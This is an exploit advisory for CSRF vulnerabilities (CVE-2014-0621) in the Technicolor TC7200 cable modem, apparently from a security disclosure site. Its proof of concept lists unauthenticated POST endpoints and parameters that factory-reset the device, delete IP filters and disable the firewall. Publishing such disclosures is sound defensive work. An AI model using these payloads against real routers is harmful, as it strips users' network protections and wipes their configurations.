Technicolor TC7200 - Multiple CSRF Vulnerabilities

2014-01-11 / 2014-01-12
Credit: Jeroen - IT Nerdbox
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2014-0621
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Technicolor TC7200 - Multiple CSRF Vulnerabilities # Google Dork: N/A # Date: 02-01-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gateways/tc7200-tc7300 # Software Link: N/A # Version: STD6.01.12 # Tested on: N/A # CVE : CVE-2014-0621 # # Proof of Concept: # # ## Payload for Factory Reset: # # POST : http://<ip>/goform/system/factory # Parameter: None # ## Payload to disable the advanced options: # # POST : http://<ip>/goform/advanced/options # Parameter: None # ## Payload to remove ip-filters: # # POST : http://<ip>//goform/advanced/ip-filters # Parameter: IpFilterAddressDelete1 = 1 # ## Payload to remove firewall settings # # POST : http://<ip>/goform/advanced/firewall # Parameter: cbFirewall = 1 # # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/

References:

http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top